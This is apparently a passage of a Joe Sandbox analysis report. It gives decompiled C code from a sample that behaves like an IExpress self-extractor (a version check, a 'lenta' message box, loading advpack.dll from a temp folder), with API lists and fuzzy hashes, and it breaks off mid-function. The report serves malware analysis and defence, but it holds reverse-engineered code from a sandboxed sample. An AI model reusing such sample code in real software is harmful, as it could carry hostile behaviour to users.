                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: DirectoryPrivateProfileStringWindowsWrite_lclose_llseek_lopen
                                                                                                                                                                                                                                              • String ID: wininit.ini
                                                                                                                                                                                                                                              • API String ID: 3273605193-4206010578
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              C-Code - Quality: 75%
                                                                                                                                                                                                                                              			E009736EE(CHAR* __ecx) {
                                                                                                                                                                                                                                              				signed int _v8;
                                                                                                                                                                                                                                              				char _v268;
                                                                                                                                                                                                                                              				struct _OSVERSIONINFOA _v416;
                                                                                                                                                                                                                                              				signed int _v420;
                                                                                                                                                                                                                                              				signed int _v424;
                                                                                                                                                                                                                                              				CHAR* _v428;
                                                                                                                                                                                                                                              				CHAR* _v432;
                                                                                                                                                                                                                                              				signed int _v436;
                                                                                                                                                                                                                                              				CHAR* _v440;
                                                                                                                                                                                                                                              				void* __ebx;
                                                                                                                                                                                                                                              				void* __edi;
                                                                                                                                                                                                                                              				void* __esi;
                                                                                                                                                                                                                                              				signed int _t72;
                                                                                                                                                                                                                                              				CHAR* _t77;
                                                                                                                                                                                                                                              				CHAR* _t91;
                                                                                                                                                                                                                                              				CHAR* _t94;
                                                                                                                                                                                                                                              				int _t97;
                                                                                                                                                                                                                                              				CHAR* _t98;
                                                                                                                                                                                                                                              				signed char _t99;
                                                                                                                                                                                                                                              				CHAR* _t104;
                                                                                                                                                                                                                                              				signed short _t107;
                                                                                                                                                                                                                                              				signed int _t109;
                                                                                                                                                                                                                                              				short _t113;
                                                                                                                                                                                                                                              				void* _t114;
                                                                                                                                                                                                                                              				signed char _t115;
                                                                                                                                                                                                                                              				short _t119;
                                                                                                                                                                                                                                              				CHAR* _t123;
                                                                                                                                                                                                                                              				CHAR* _t124;
                                                                                                                                                                                                                                              				CHAR* _t129;
                                                                                                                                                                                                                                              				signed int _t131;
                                                                                                                                                                                                                                              				signed int _t132;
                                                                                                                                                                                                                                              				CHAR* _t135;
                                                                                                                                                                                                                                              				CHAR* _t138;
                                                                                                                                                                                                                                              				signed int _t139;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_t72 =  *0x978004; // 0x694569f9
                                                                                                                                                                                                                                              				_v8 = _t72 ^ _t139;
                                                                                                                                                                                                                                              				_v416.dwOSVersionInfoSize = 0x94;
                                                                                                                                                                                                                                              				_t115 = __ecx;
                                                                                                                                                                                                                                              				_t135 = 0;
                                                                                                                                                                                                                                              				_v432 = __ecx;
                                                                                                                                                                                                                                              				_t138 = 0;
                                                                                                                                                                                                                                              				if(GetVersionExA( &_v416) != 0) {
                                                                                                                                                                                                                                              					_t133 = _v416.dwMajorVersion;
                                                                                                                                                                                                                                              					_t119 = 2;
                                                                                                                                                                                                                                              					_t77 = _v416.dwPlatformId - 1;
                                                                                                                                                                                                                                              					__eflags = _t77;
                                                                                                                                                                                                                                              					if(_t77 == 0) {
                                                                                                                                                                                                                                              						_t119 = 0;
                                                                                                                                                                                                                                              						__eflags = 1;
                                                                                                                                                                                                                                              						 *0x978184 = 1;
                                                                                                                                                                                                                                              						 *0x978180 = 1;
                                                                                                                                                                                                                                              						L13:
                                                                                                                                                                                                                                              						 *0x979a40 = _t119;
                                                                                                                                                                                                                                              						L14:
                                                                                                                                                                                                                                              						__eflags =  *0x978a34 - _t138; // 0x0
                                                                                                                                                                                                                                              						if(__eflags != 0) {
                                                                                                                                                                                                                                              							goto L66;
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						__eflags = _t115;
                                                                                                                                                                                                                                              						if(_t115 == 0) {
                                                                                                                                                                                                                                              							goto L66;
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						_v428 = _t135;
                                                                                                                                                                                                                                              						__eflags = _t119;
                                                                                                                                                                                                                                              						_t115 = _t115 + ((0 | _t119 != 0x00000000) - 0x00000001 & 0x0000003c) + 4;
                                                                                                                                                                                                                                              						_t11 =  &_v420;
                                                                                                                                                                                                                                              						 *_t11 = _v420 & _t138;
                                                                                                                                                                                                                                              						__eflags =  *_t11;
                                                                                                                                                                                                                                              						_v440 = _t115;
                                                                                                                                                                                                                                              						do {
                                                                                                                                                                                                                                              							_v424 = _t135 * 0x18;
                                                                                                                                                                                                                                              							_v436 = E00972A89(_v416.dwMajorVersion, _v416.dwMinorVersion,  *((intOrPtr*)(_t135 * 0x18 + _t115)),  *((intOrPtr*)(_t135 * 0x18 + _t115 + 4)));
                                                                                                                                                                                                                                              							_t91 = E00972A89(_v416.dwMajorVersion, _v416.dwMinorVersion,  *((intOrPtr*)(_v424 + _t115 + 0xc)),  *((intOrPtr*)(_v424 + _t115 + 0x10)));
                                                                                                                                                                                                                                              							_t123 = _v436;
                                                                                                                                                                                                                                              							_t133 = 0x54d;
                                                                                                                                                                                                                                              							__eflags = _t123;
                                                                                                                                                                                                                                              							if(_t123 < 0) {
                                                                                                                                                                                                                                              								L32:
                                                                                                                                                                                                                                              								__eflags = _v420 - 1;
                                                                                                                                                                                                                                              								if(_v420 == 1) {
                                                                                                                                                                                                                                              									_t138 = 0x54c;
                                                                                                                                                                                                                                              									L36:
                                                                                                                                                                                                                                              									__eflags = _t138;
                                                                                                                                                                                                                                              									if(_t138 != 0) {
                                                                                                                                                                                                                                              										L40:
                                                                                                                                                                                                                                              										__eflags = _t138 - _t133;
                                                                                                                                                                                                                                              										if(_t138 == _t133) {
                                                                                                                                                                                                                                              											L30:
                                                                                                                                                                                                                                              											_v420 = _v420 & 0x00000000;
                                                                                                                                                                                                                                              											_t115 = 0;
                                                                                                                                                                                                                                              											_v436 = _v436 & 0x00000000;
                                                                                                                                                                                                                                              											__eflags = _t138 - _t133;
                                                                                                                                                                                                                                              											_t133 = _v432;
                                                                                                                                                                                                                                              											if(__eflags != 0) {
                                                                                                                                                                                                                                              												_t124 = _v440;
                                                                                                                                                                                                                                              											} else {
                                                                                                                                                                                                                                              												_t124 = _t133[0x80] + 0x84 + _t135 * 0x3c + _t133;
                                                                                                                                                                                                                                              												_v420 =  &_v268;
                                                                                                                                                                                                                                              											}
                                                                                                                                                                                                                                              											__eflags = _t124;
                                                                                                                                                                                                                                              											if(_t124 == 0) {
                                                                                                                                                                                                                                              												_t135 = _v436;
                                                                                                                                                                                                                                              											} else {
                                                                                                                                                                                                                                              												_t99 = _t124[0x30];
                                                                                                                                                                                                                                              												_t135 = _t124[0x34] + 0x84 + _t133;
                                                                                                                                                                                                                                              												__eflags = _t99 & 0x00000001;
                                                                                                                                                                                                                                              												if((_t99 & 0x00000001) == 0) {
                                                                                                                                                                                                                                              													asm("sbb ebx, ebx");
                                                                                                                                                                                                                                              													_t115 =  ~(_t99 & 2) & 0x00000101;
                                                                                                                                                                                                                                              												} else {
                                                                                                                                                                                                                                              													_t115 = 0x104;
                                                                                                                                                                                                                                              												}
                                                                                                                                                                                                                                              											}
                                                                                                                                                                                                                                              											__eflags =  *0x978a38 & 0x00000001;
                                                                                                                                                                                                                                              											if(( *0x978a38 & 0x00000001) != 0) {
                                                                                                                                                                                                                                              												L64:
                                                                                                                                                                                                                                              												_push(0);
                                                                                                                                                                                                                                              												_push(0x30);
                                                                                                                                                                                                                                              												_push(_v420);
                                                                                                                                                                                                                                              												_push("lenta");
                                                                                                                                                                                                                                              												goto L65;
                                                                                                                                                                                                                                              											} else {
                                                                                                                                                                                                                                              												__eflags = _t135;
                                                                                                                                                                                                                                              												if(_t135 == 0) {
                                                                                                                                                                                                                                              													goto L64;
                                                                                                                                                                                                                                              												}
                                                                                                                                                                                                                                              												__eflags =  *_t135;
                                                                                                                                                                                                                                              												if( *_t135 == 0) {
                                                                                                                                                                                                                                              													goto L64;
                                                                                                                                                                                                                                              												}
                                                                                                                                                                                                                                              												MessageBeep(0);
                                                                                                                                                                                                                                              												_t94 = E0097681F(_t115);
                                                                                                                                                                                                                                              												__eflags = _t94;
                                                                                                                                                                                                                                              												if(_t94 == 0) {
                                                                                                                                                                                                                                              													L57:
                                                                                                                                                                                                                                              													0x180030 = 0x30;
                                                                                                                                                                                                                                              													L58:
                                                                                                                                                                                                                                              													_t97 = MessageBoxA(0, _t135, "lenta", 0x00180030 | _t115);
                                                                                                                                                                                                                                              													__eflags = _t115 & 0x00000004;
                                                                                                                                                                                                                                              													if((_t115 & 0x00000004) == 0) {
                                                                                                                                                                                                                                              														__eflags = _t115 & 0x00000001;
                                                                                                                                                                                                                                              														if((_t115 & 0x00000001) == 0) {
                                                                                                                                                                                                                                              															goto L66;
                                                                                                                                                                                                                                              														}
                                                                                                                                                                                                                                              														__eflags = _t97 - 1;
                                                                                                                                                                                                                                              														L62:
                                                                                                                                                                                                                                              														if(__eflags == 0) {
                                                                                                                                                                                                                                              															_t138 = 0;
                                                                                                                                                                                                                                              														}
                                                                                                                                                                                                                                              														goto L66;
                                                                                                                                                                                                                                              													}
                                                                                                                                                                                                                                              													__eflags = _t97 - 6;
                                                                                                                                                                                                                                              													goto L62;
                                                                                                                                                                                                                                              												}
                                                                                                                                                                                                                                              												_t98 = E009767C9(_t124, _t124);
                                                                                                                                                                                                                                              												__eflags = _t98;
                                                                                                                                                                                                                                              												if(_t98 == 0) {
                                                                                                                                                                                                                                              													goto L57;
                                                                                                                                                                                                                                              												}
                                                                                                                                                                                                                                              												goto L58;
                                                                                                                                                                                                                                              											}
                                                                                                                                                                                                                                              										}
                                                                                                                                                                                                                                              										__eflags = _t138 - 0x54c;
                                                                                                                                                                                                                                              										if(_t138 == 0x54c) {
                                                                                                                                                                                                                                              											goto L30;
                                                                                                                                                                                                                                              										}
                                                                                                                                                                                                                                              										__eflags = _t138;
                                                                                                                                                                                                                                              										if(_t138 == 0) {
                                                                                                                                                                                                                                              											goto L66;
                                                                                                                                                                                                                                              										}
                                                                                                                                                                                                                                              										_t135 = 0;
                                                                                                                                                                                                                                              										__eflags = 0;
                                                                                                                                                                                                                                              										goto L44;
                                                                                                                                                                                                                                              									}
                                                                                                                                                                                                                                              									L37:
                                                                                                                                                                                                                                              									_t129 = _v432;
                                                                                                                                                                                                                                              									__eflags = _t129[0x7c];
                                                                                                                                                                                                                                              									if(_t129[0x7c] == 0) {
                                                                                                                                                                                                                                              										goto L66;
                                                                                                                                                                                                                                              									}
                                                                                                                                                                                                                                              									_t133 =  &_v268;
                                                                                                                                                                                                                                              									_t104 = E009728E8(_t129,  &_v268, _t129,  &_v428);
                                                                                                                                                                                                                                              									__eflags = _t104;
                                                                                                                                                                                                                                              									if(_t104 != 0) {
                                                                                                                                                                                                                                              										goto L66;
                                                                                                                                                                                                                                              									}
                                                                                                                                                                                                                                              									_t135 = _v428;
                                                                                                                                                                                                                                              									_t133 = 0x54d;
                                                                                                                                                                                                                                              									_t138 = 0x54d;
                                                                                                                                                                                                                                              									goto L40;
                                                                                                                                                                                                                                              								}
                                                                                                                                                                                                                                              								goto L33;
                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                              							__eflags = _t91;
                                                                                                                                                                                                                                              							if(_t91 > 0) {
                                                                                                                                                                                                                                              								goto L32;
                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                              							__eflags = _t123;
                                                                                                                                                                                                                                              							if(_t123 != 0) {
                                                                                                                                                                                                                                              								__eflags = _t91;
                                                                                                                                                                                                                                              								if(_t91 != 0) {
                                                                                                                                                                                                                                              									goto L37;
                                                                                                                                                                                                                                              								}
                                                                                                                                                                                                                                              								__eflags = (_v416.dwBuildNumber & 0x0000ffff) -  *((intOrPtr*)(_v424 + _t115 + 0x14));
                                                                                                                                                                                                                                              								L27:
                                                                                                                                                                                                                                              								if(__eflags <= 0) {
                                                                                                                                                                                                                                              									goto L37;
                                                                                                                                                                                                                                              								}
                                                                                                                                                                                                                                              								L28:
                                                                                                                                                                                                                                              								__eflags = _t135;
                                                                                                                                                                                                                                              								if(_t135 == 0) {
                                                                                                                                                                                                                                              									goto L33;
                                                                                                                                                                                                                                              								}
                                                                                                                                                                                                                                              								_t138 = 0x54c;
                                                                                                                                                                                                                                              								goto L30;
                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                              							__eflags = _t91;
                                                                                                                                                                                                                                              							_t107 = _v416.dwBuildNumber;
                                                                                                                                                                                                                                              							if(_t91 != 0) {
                                                                                                                                                                                                                                              								_t131 = _v424;
                                                                                                                                                                                                                                              								__eflags = (_t107 & 0x0000ffff) -  *((intOrPtr*)(_t131 + _t115 + 8));
                                                                                                                                                                                                                                              								if((_t107 & 0x0000ffff) >=  *((intOrPtr*)(_t131 + _t115 + 8))) {
                                                                                                                                                                                                                                              									goto L37;
                                                                                                                                                                                                                                              								}
                                                                                                                                                                                                                                              								goto L28;
                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                              							_t132 = _t107 & 0x0000ffff;
                                                                                                                                                                                                                                              							_t109 = _v424;
                                                                                                                                                                                                                                              							__eflags = _t132 -  *((intOrPtr*)(_t109 + _t115 + 8));
                                                                                                                                                                                                                                              							if(_t132 <  *((intOrPtr*)(_t109 + _t115 + 8))) {
                                                                                                                                                                                                                                              								goto L28;
                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                              							__eflags = _t132 -  *((intOrPtr*)(_t109 + _t115 + 0x14));
                                                                                                                                                                                                                                              							goto L27;
                                                                                                                                                                                                                                              							L33:
                                                                                                                                                                                                                                              							_t135 =  &(_t135[1]);
                                                                                                                                                                                                                                              							_v428 = _t135;
                                                                                                                                                                                                                                              							_v420 = _t135;
                                                                                                                                                                                                                                              							__eflags = _t135 - 2;
                                                                                                                                                                                                                                              						} while (_t135 < 2);
                                                                                                                                                                                                                                              						goto L36;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					__eflags = _t77 == 1;
                                                                                                                                                                                                                                              					if(_t77 == 1) {
                                                                                                                                                                                                                                              						 *0x979a40 = _t119;
                                                                                                                                                                                                                                              						 *0x978184 = 1;
                                                                                                                                                                                                                                              						 *0x978180 = 1;
                                                                                                                                                                                                                                              						__eflags = _t133 - 3;
                                                                                                                                                                                                                                              						if(_t133 > 3) {
                                                                                                                                                                                                                                              							__eflags = _t133 - 5;
                                                                                                                                                                                                                                              							if(_t133 < 5) {
                                                                                                                                                                                                                                              								goto L14;
                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                              							_t113 = 3;
                                                                                                                                                                                                                                              							_t119 = _t113;
                                                                                                                                                                                                                                              							goto L13;
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						_t119 = 1;
                                                                                                                                                                                                                                              						_t114 = 3;
                                                                                                                                                                                                                                              						 *0x979a40 = 1;
                                                                                                                                                                                                                                              						__eflags = _t133 - _t114;
                                                                                                                                                                                                                                              						if(__eflags < 0) {
                                                                                                                                                                                                                                              							L9:
                                                                                                                                                                                                                                              							 *0x978184 = _t135;
                                                                                                                                                                                                                                              							 *0x978180 = _t135;
                                                                                                                                                                                                                                              							goto L14;
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						if(__eflags != 0) {
                                                                                                                                                                                                                                              							goto L14;
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						__eflags = _v416.dwMinorVersion - 0x33;
                                                                                                                                                                                                                                              						if(_v416.dwMinorVersion >= 0x33) {
                                                                                                                                                                                                                                              							goto L14;
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						goto L9;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					_t138 = 0x4ca;
                                                                                                                                                                                                                                              					goto L44;
                                                                                                                                                                                                                                              				} else {
                                                                                                                                                                                                                                              					_t138 = 0x4b4;
                                                                                                                                                                                                                                              					L44:
                                                                                                                                                                                                                                              					_push(_t135);
                                                                                                                                                                                                                                              					_push(0x10);
                                                                                                                                                                                                                                              					_push(_t135);
                                                                                                                                                                                                                                              					_push(_t135);
                                                                                                                                                                                                                                              					L65:
                                                                                                                                                                                                                                              					_t133 = _t138;
                                                                                                                                                                                                                                              					E009744B9(0, _t138);
                                                                                                                                                                                                                                              					L66:
                                                                                                                                                                                                                                              					return E00976CE0(0 | _t138 == 0x00000000, _t115, _v8 ^ _t139, _t133, _t135, _t138);
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              			}





































                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x009737cb
                                                                                                                                                                                                                                              0x009737cd
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x009737d5
                                                                                                                                                                                                                                              0x009737db
                                                                                                                                                                                                                                              0x009737e8
                                                                                                                                                                                                                                              0x009737ea
                                                                                                                                                                                                                                              0x009737ea
                                                                                                                                                                                                                                              0x009737ea
                                                                                                                                                                                                                                              0x009737f0
                                                                                                                                                                                                                                              0x009737f6
                                                                                                                                                                                                                                              0x00973805
                                                                                                                                                                                                                                              0x00973817
                                                                                                                                                                                                                                              0x0097382b
                                                                                                                                                                                                                                              0x00973830
                                                                                                                                                                                                                                              0x00973836
                                                                                                                                                                                                                                              0x0097383b
                                                                                                                                                                                                                                              0x0097383d
                                                                                                                                                                                                                                              0x009738eb
                                                                                                                                                                                                                                              0x009738eb
                                                                                                                                                                                                                                              0x009738f2
                                                                                                                                                                                                                                              0x0097390c
                                                                                                                                                                                                                                              0x00973911
                                                                                                                                                                                                                                              0x00973911
                                                                                                                                                                                                                                              0x00973913
                                                                                                                                                                                                                                              0x0097394d
                                                                                                                                                                                                                                              0x0097394d
                                                                                                                                                                                                                                              0x0097394f
                                                                                                                                                                                                                                              0x009738a9
                                                                                                                                                                                                                                              0x009738a9
                                                                                                                                                                                                                                              0x009738b0
                                                                                                                                                                                                                                              0x009738b2
                                                                                                                                                                                                                                              0x009738b9
                                                                                                                                                                                                                                              0x009738bb
                                                                                                                                                                                                                                              0x009738c1
                                                                                                                                                                                                                                              0x00973975
                                                                                                                                                                                                                                              0x009738c7
                                                                                                                                                                                                                                              0x009738de
                                                                                                                                                                                                                                              0x009738e0
                                                                                                                                                                                                                                              0x009738e0
                                                                                                                                                                                                                                              0x0097397b
                                                                                                                                                                                                                                              0x0097397d
                                                                                                                                                                                                                                              0x009739a9
                                                                                                                                                                                                                                              0x0097397f
                                                                                                                                                                                                                                              0x00973982
                                                                                                                                                                                                                                              0x0097398b
                                                                                                                                                                                                                                              0x0097398d
                                                                                                                                                                                                                                              0x0097398f
                                                                                                                                                                                                                                              0x0097399f
                                                                                                                                                                                                                                              0x009739a1
                                                                                                                                                                                                                                              0x00973991
                                                                                                                                                                                                                                              0x00973991
                                                                                                                                                                                                                                              0x00973991
                                                                                                                                                                                                                                              0x0097398f
                                                                                                                                                                                                                                              0x009739af
                                                                                                                                                                                                                                              0x009739b6
                                                                                                                                                                                                                                              0x00973a0f
                                                                                                                                                                                                                                              0x00973a0f
                                                                                                                                                                                                                                              0x00973a11
                                                                                                                                                                                                                                              0x00973a13
                                                                                                                                                                                                                                              0x00973a19
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x009739b8
                                                                                                                                                                                                                                              0x009739b8
                                                                                                                                                                                                                                              0x009739ba
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x009739bc
                                                                                                                                                                                                                                              0x009739bf
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x009739c3
                                                                                                                                                                                                                                              0x009739c9
                                                                                                                                                                                                                                              0x009739ce
                                                                                                                                                                                                                                              0x009739d0
                                                                                                                                                                                                                                              0x009739e3
                                                                                                                                                                                                                                              0x009739e5
                                                                                                                                                                                                                                              0x009739e6
                                                                                                                                                                                                                                              0x009739f1
                                                                                                                                                                                                                                              0x009739f7
                                                                                                                                                                                                                                              0x009739fa
                                                                                                                                                                                                                                              0x00973a01
                                                                                                                                                                                                                                              0x00973a04
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00973a06
                                                                                                                                                                                                                                              0x00973a09
                                                                                                                                                                                                                                              0x00973a09
                                                                                                                                                                                                                                              0x00973a0b
                                                                                                                                                                                                                                              0x00973a0b
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00973a09
                                                                                                                                                                                                                                              0x009739fc
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x009739fc
                                                                                                                                                                                                                                              0x009739d3
                                                                                                                                                                                                                                              0x009739d8
                                                                                                                                                                                                                                              0x009739da
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x009739dc
                                                                                                                                                                                                                                              0x009739b6
                                                                                                                                                                                                                                              0x00973955
                                                                                                                                                                                                                                              0x0097395b
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00973961
                                                                                                                                                                                                                                              0x00973963

APIs
• GetVersionExA.KERNEL32(?,00000000,?,?), ref: 00973723
• MessageBeep.USER32(00000000), ref: 009739C3
• MessageBoxA.USER32(00000000,00000000,lenta,00000030), ref: 009739F1
Strings
Memory Dump Source
• Source File: 00000000.00000002.425756198.0000000000971000.00000020.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
• Associated: 00000000.00000002.425746589.0000000000970000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.425770943.0000000000978000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.425785812.000000000097A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.425785812.000000000097C000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_970000_file.jbxd
Similarity
• API ID: Message$BeepVersion
• String ID: 3$lenta
• API String ID: 2519184315-4216304122
• Opcode ID: afb50dab65dcf22d9b071682efee96b34c4d691fc957cd787fd9dd5fc7a8d8c7
• Instruction ID: ed99738cf56bad5b2e581903d003d95f9eeb869699c6c3e2bb34d4d1d90e07f6
• Opcode Fuzzy Hash: afb50dab65dcf22d9b071682efee96b34c4d691fc957cd787fd9dd5fc7a8d8c7
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1D91F2B3B152259BEB388B15CD81BEA73B4EB81304F14C0A9D98D9B251D7748F81EF01
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              C-Code - Quality: 83%
                                                                                                                                                                                                                                              			E00976495(void* __ebx, void* __ecx, void* __esi, void* __eflags) {
                                                                                                                                                                                                                                              				signed int _v8;
                                                                                                                                                                                                                                              				char _v268;
                                                                                                                                                                                                                                              				void* __edi;
                                                                                                                                                                                                                                              				signed int _t9;
                                                                                                                                                                                                                                              				signed char _t14;
                                                                                                                                                                                                                                              				struct HINSTANCE__* _t15;
                                                                                                                                                                                                                                              				void* _t18;
                                                                                                                                                                                                                                              				CHAR* _t26;
                                                                                                                                                                                                                                              				void* _t27;
                                                                                                                                                                                                                                              				signed int _t28;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_t27 = __esi;
                                                                                                                                                                                                                                              				_t18 = __ebx;
                                                                                                                                                                                                                                              				_t9 =  *0x978004; // 0x694569f9
                                                                                                                                                                                                                                              				_v8 = _t9 ^ _t28;
                                                                                                                                                                                                                                              				_push(__ecx);
                                                                                                                                                                                                                                              				E00971781( &_v268, 0x104, __ecx, "C:\Users\jones\AppData\Local\Temp\IXP000.TMP\");
                                                                                                                                                                                                                                              				_t26 = "advpack.dll";
                                                                                                                                                                                                                                              				E0097658A( &_v268, 0x104, _t26);
                                                                                                                                                                                                                                              				_t14 = GetFileAttributesA( &_v268);
                                                                                                                                                                                                                                              				if(_t14 == 0xffffffff || (_t14 & 0x00000010) != 0) {
                                                                                                                                                                                                                                              					_t15 = LoadLibraryA(_t26);
                                                                                                                                                                                                                                              				} else {
                                                                                                                                                                                                                                              					_t15 = LoadLibraryExA( &_v268, 0, 8);
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				return E00976CE0(_t15, _t18, _v8 ^ _t28, 0x104, _t26, _t27);
                                                                                                                                                                                                                                              			}














                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetFileAttributesA.KERNEL32(?,advpack.dll,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,00000000), ref: 009764DF
                                                                                                                                                                                                                                              • LoadLibraryExA.KERNEL32(?,00000000,00000008,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,00000000), ref: 009764F9
                                                                                                                                                                                                                                              • LoadLibraryA.KERNEL32(advpack.dll,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,00000000), ref: 00976502
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.425756198.0000000000971000.00000020.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
• Associated: 00000000.00000002.425746589.0000000000970000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.425770943.0000000000978000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.425785812.000000000097A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.425785812.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: LibraryLoad$AttributesFile
                                                                                                                                                                                                                                              • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$advpack.dll
                                                                                                                                                                                                                                              • API String ID: 438848745-3680919256
                                                                                                                                                                                                                                              • Opcode ID: d59a380f027e92788f37a0fad7194d907075103eb0d7a93de6ca3b712d315626
                                                                                                                                                                                                                                              • Instruction ID: 423149ca0caa90c2f24e5e247cfe0629c0c7bd500edd2a66876af3608a48bb2c
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d59a380f027e92788f37a0fad7194d907075103eb0d7a93de6ca3b712d315626
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4C01D132A18108ABDB20DB74DC4ABEE7378EBD1711F904195F58D921C0DF709ECADA51
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                                                                                              			E009728E8(intOrPtr __ecx, char* __edx, intOrPtr* _a8) {
                                                                                                                                                                                                                                              				void* _v8;
                                                                                                                                                                                                                                              				char* _v12;
                                                                                                                                                                                                                                              				intOrPtr _v16;
                                                                                                                                                                                                                                              				void* _v20;
                                                                                                                                                                                                                                              				intOrPtr _v24;
                                                                                                                                                                                                                                              				int _v28;
                                                                                                                                                                                                                                              				int _v32;
                                                                                                                                                                                                                                              				void* _v36;
                                                                                                                                                                                                                                              				int _v40;
                                                                                                                                                                                                                                              				void* _v44;
                                                                                                                                                                                                                                              				intOrPtr _v48;
                                                                                                                                                                                                                                              				intOrPtr _v52;
                                                                                                                                                                                                                                              				intOrPtr _v56;
                                                                                                                                                                                                                                              				intOrPtr _v60;
                                                                                                                                                                                                                                              				intOrPtr _v64;
                                                                                                                                                                                                                                              				long _t68;
                                                                                                                                                                                                                                              				void* _t70;
                                                                                                                                                                                                                                              				void* _t73;
                                                                                                                                                                                                                                              				void* _t79;
                                                                                                                                                                                                                                              				void* _t83;
                                                                                                                                                                                                                                              				void* _t87;
                                                                                                                                                                                                                                              				void* _t88;
                                                                                                                                                                                                                                              				intOrPtr _t93;
                                                                                                                                                                                                                                              				intOrPtr _t97;
                                                                                                                                                                                                                                              				intOrPtr _t99;
                                                                                                                                                                                                                                              				int _t101;
                                                                                                                                                                                                                                              				void* _t103;
                                                                                                                                                                                                                                              				void* _t106;
                                                                                                                                                                                                                                              				void* _t109;
                                                                                                                                                                                                                                              				void* _t110;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_v12 = __edx;
                                                                                                                                                                                                                                              				_t99 = __ecx;
                                                                                                                                                                                                                                              				_t106 = 0;
                                                                                                                                                                                                                                              				_v16 = __ecx;
                                                                                                                                                                                                                                              				_t87 = 0;
                                                                                                                                                                                                                                              				_t103 = 0;
                                                                                                                                                                                                                                              				_v20 = 0;
                                                                                                                                                                                                                                              				if( *((intOrPtr*)(__ecx + 0x7c)) <= 0) {
                                                                                                                                                                                                                                              					L19:
                                                                                                                                                                                                                                              					_t106 = 1;
                                                                                                                                                                                                                                              				} else {
                                                                                                                                                                                                                                              					_t62 = 0;
                                                                                                                                                                                                                                              					_v8 = 0;
                                                                                                                                                                                                                                              					while(1) {
                                                                                                                                                                                                                                              						_v24 =  *((intOrPtr*)(_t99 + 0x80));
                                                                                                                                                                                                                                              						if(E00972773(_v12,  *((intOrPtr*)(_t62 + _t99 +  *((intOrPtr*)(_t99 + 0x80)) + 0xbc)) + _t99 + 0x84) == 0) {
                                                                                                                                                                                                                                              							goto L20;
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						_t68 = GetFileVersionInfoSizeA(_v12,  &_v32);
                                                                                                                                                                                                                                              						_v28 = _t68;
                                                                                                                                                                                                                                              						if(_t68 == 0) {
                                                                                                                                                                                                                                              							_t99 = _v16;
                                                                                                                                                                                                                                              							_t70 = _v8 + _t99;
                                                                                                                                                                                                                                              							_t93 = _v24;
